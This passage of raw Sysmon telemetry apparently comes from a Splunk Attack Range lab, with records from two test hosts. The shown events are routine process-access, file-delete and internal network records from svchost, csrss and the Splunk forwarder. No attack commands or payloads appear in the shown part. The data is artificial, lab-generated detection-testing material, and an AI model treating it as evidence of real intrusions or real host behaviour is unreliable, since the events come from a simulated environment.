10:45:51.523{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-105F-6216-3A04-000000003902}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.523{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-105F-6216-3A04-000000003902}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:51.524{4F8D34B0-105F-6216-3A04-000000003902}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:52.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D32DC2CDA08C80E8D2F696360E766104,SHA256=B8DEE76C35A1785F40F44C2CF77BCB28D700E4299AB7FC02EE3D5827AF29A3D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:52.679{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E958CA607C70DF2E231C331EC2CD994E,SHA256=EF4894D99128FB9D578B6F20E8665A7C23CA8E4B79E29018525FEC5906FD8A4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:49.578{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53367-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000215836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:52.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F40780A9FA5111654BE08C0771E73B5,SHA256=DB3FBD126F9769C51ECE10940E0EFE10484DBB69E02EF21EFE678E333CF567B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:53.932{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21912C77A50855E475A865CD0FC3079E,SHA256=838CCBAA2EF000A5B3A3762A079F327C154D989ADA80BC173B8467B701086F59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:53.788{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D00C328CB9990048B102FBC03573AE5D,SHA256=0EC108551EACEDD230E29302C08C906F5F68CAA83B1633AACC64B6531075ED96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:54.882{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B90CD1E03C1F0EAEFBC56259707CE31D,SHA256=117318E3D04C057A832077E61B161A3354AC028214BA08C3F060B776461FFB13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286872Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:54.963{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FBC1579ACD80F8CCD32DAE5B34B2390,SHA256=BEC7DD42689F154CD47F336420BDD0491EBE38988D9794242DDEC5C3F6510522,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:55.882{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A568E4E51EFFCA381A7EEAC840063A2B,SHA256=4FB510FF6568A04501A417DD839BFF77A0BAEA84B5983BAF0D946BF170CD33DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286873Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:55.979{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4661645BCFD358A91DF7D899CA5E858,SHA256=E930D197374B74DEEC11BB5B161B8860D7488C7F376352C1A105CFE8A2D1D01A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:56.898{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3703E40E189C893F69F8EDF3BD57DA74,SHA256=1E2CDE98A200EB86DD6414907C3ABBBE77B83A964407EBDA2C2CEE5DC3C6921F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286874Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:56.994{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C97CBFB8300CF9DE363C8A9E4F3B17B,SHA256=D3DB4C1EC899A93B8675BBD3C37B86621077376344683062C5709EBA214F66C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215843Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:57.913{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9894D0E58BFD0EBC3F484C9909BB8074,SHA256=8EEB917096DE34B6B33DF9FD1059EADF27F8B231F6C236B21E1FB9B595A6EFBB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:54.509{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51282-false10.0.1.12-8000- 354300x8000000000000000286876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:55.593{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53368-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286875Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:58.073{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF91E365A7539BAB27A2259DE40401AE,SHA256=60BC637B7DB57A8923E78315F5EDC5D38238EAC71351A82E8926C56AD24DE108,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:59.166{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C2DFA58992C078E230F15EFE5A2A5BD,SHA256=8CDC23EEE89AFDBD858071C315D2448E47ECC2CA6859DF5E34518C8339A5984D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215844Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:59.007{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28325855D0E0EEF2B2C2798AE3B0BD17,SHA256=04B56F58D3BED6C2890654D84AA4DD3E652D515938B2A95EB1CD384979806A6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286878Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:00.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7A96477F3E9B832F9A7CE01CA99D5AC,SHA256=57309F3057AE3C795EF51EBB7DB181E604487A0175BB202A5113EC38C169E145,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:00.023{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=119F141B4000F7F53F646D7C9158D709,SHA256=9E1433212188655094F0A05472ED2E9C00E1DFE08E2039C3A1DE2CF8DED31BEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:59.572{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51283-false10.0.1.12-8000- 23542300x8000000000000000215846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:01.085{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F203908DB4411DA3417B0E70FBE92D2,SHA256=58AD40C32F1FBC8C6BB1FC4853E59C56820D363A75CAE9918CF6A3F4F460DFE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286887Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:01.713{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1069-6216-E904-000000003802}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286886Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:01.713{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286885Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:01.713{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286884Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:01.713{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286883Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:01.713{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM